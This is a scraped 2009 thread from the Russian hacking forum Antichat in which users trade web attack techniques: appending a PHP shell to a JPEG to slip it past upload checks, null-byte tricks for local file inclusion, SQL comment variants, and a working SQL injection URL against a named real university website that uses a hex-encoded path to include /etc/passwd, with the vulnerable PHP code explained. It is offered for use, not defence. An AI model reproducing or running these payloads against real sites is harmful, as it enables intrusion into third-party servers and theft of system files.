HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.09.2009, 07:37
Explоit
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами: 8845773

Репутация: -11
По умолчанию

[QUOTE=Explоit]Я имео ввиду по умалчанию, я даже выделил это слово жирно/QUOTE]
 
Ответить с цитированием

  #2  
Старый 24.09.2009, 16:32
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Ins3t  
ATLANT_93, используйте WinHex.
Откройте ним вашу картинку, перейдите в конец (последнее значение - FF D9), замените FF D9 на 00 00, и после этих нолей вставне ваш php код, выбрав при этом формат добавляемых данных - ASCII.После вставленого кода напишите FF D9. Сохраните файл и все готово.
Поясни пожалуйста, что это за хренотень, и от чего, по твоему, это должно помогать.

ATLANT_93
По поводу шелла в картинке.
1 Метаданные
2 Просто переименовать расширение php файла
3 В конец файла

Пролезет или нет зависит ТОЛЬКО от проверок при загрузке, и манипуляции с FF D9 мне не понятны.

Gray_Wolf
Линк давай в тему, это не клуб экстрасенсов
 
Ответить с цитированием

  #3  
Старый 24.09.2009, 16:58
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Ins3t  
2jokester
Это не "хренотень" как вы выразелись, это как раз таки способ запихнуть код в картинку без использования метаданных.
ага а

$cat pic.jpg shell.php > poisoned.jpg

это способ не знать про хекс эдитор.

Цитата:
Сообщение от Ins3t  
чем вас хекс эдитор не устроил?
Гвозди можно забивать микроскопом, но зачем?
Зачем делать магический ритуал из простой вещи?
Конечно применить хекс-эдитор это мегахакерский ход. Двигать байты, делать при этом серьезное лицо, это круто.

Последний раз редактировалось geezer.code; 24.09.2009 в 17:17..
 
Ответить с цитированием

  #4  
Старый 24.09.2009, 17:13
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Ins3t  
2jokester
Это не "хренотень" как вы выразелись, это как раз таки способ запихнуть код в картинку без использования метаданных.
Я повторю свои вопросы более конкретно. Хотелось бы услышать ясный и чёткий ответ, если ты действительно понимаешь зачем это делать, а не просто тупо прочитал где-то (я даже знаю где) и теперь не задумываясь постишь это тут.

Вопросы:
Зачем я должен проделывать такие вещи с хекс эдитором?
Что КОНКРЕТНО это даёт?
Почему нужно менять именно эти байты?
Как это поможет при заливке картинки и что изменится если я этого делать не буду, а просто впихну код в конец никак не заморачиваясь с этими чудесами, или в метаданные, с которыми, кстати, заморачиваться не нужно, это элементарная операция?
Какую проверку это позволит обойти, из тех, что невозможно обойти предложенными мной вариантами?
 
Ответить с цитированием

  #5  
Старый 29.09.2009, 12:39
paypoker
Новичок
Регистрация: 03.08.2009
Сообщений: 7
С нами: 8827380

Репутация: 0
По умолчанию

можно ли в mysql в подзапросе записать инфу в файл?
 
Ответить с цитированием

  #6  
Старый 13.10.2009, 15:10
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Krist_ALL  
подскажите плз


непойму как регулярки обмануть..
И откуда ты раздобыл такую увлекательную задачку..
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #7  
Старый 21.10.2009, 13:52
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от DeluxeS  
Помогите с чем то , помойму инклуд , LFI вроде.. Опыта совсем нет в этом

- где imyascripta: там расширение .php добавляется само...
Можно ли что то раскрутить?
Мало информации.
А вообще можно, нулл байт тебе в руки! (%00, %0A, %0D)
 
Ответить с цитированием

  #8  
Старый 21.10.2009, 16:56
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

Цитата:
Сообщение от Strilo4ka  
а по поводу include что то не понятно мне пока...
Цитата:
Сообщение от AFoST  
о ептыть тут еще инклуд есть
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr
в php-файле, который исполняется есть строчки примерно такие:
PHP код:
mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET); 
далее
$pole2 = присваивается значение 2 поля.
после этого идёт локаьный инклуд файла
PHP код:
main('../'.$pole2); 
Мы запросом
PHP код:
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr 
делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.
PHP код:
0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764
это равно
../../../../../etc/passwd 
соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
Что непонятно - спрашивай.
__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 21.10.2009 в 16:58..
 
Ответить с цитированием

  #9  
Старый 21.10.2009, 19:13
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

Цитата:
Сообщение от Strilo4ka  
теперь догнал AFoST. только не 0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737377 64, а 2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 . Пробела нет перед 64. Оно наверно неправильно вставилось когда пост писался. Только что пропустил через bin2hex("../../../../../etc/passwd");. Кстати и что на ети данные дают интересно, как их использовать. что любой файл на хостинге прочитать можно это понятно. но это не GLOBAL INJECTION, толку от нее... Просто интересно для загального развития AFoST:
1. форум античата в длинных строках вставляет пробелы.
2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #10  
Старый 21.10.2009, 19:13
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Strilo4ka  
кстати а этот коментарий /* в запросе нельзя было использовать... Да выводит ошыбку, типа слеш служебный наверно. А че так??? да понятно что надо еще поросчихлять.
Хотя бы есть выбор:
--
{
%23
#
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.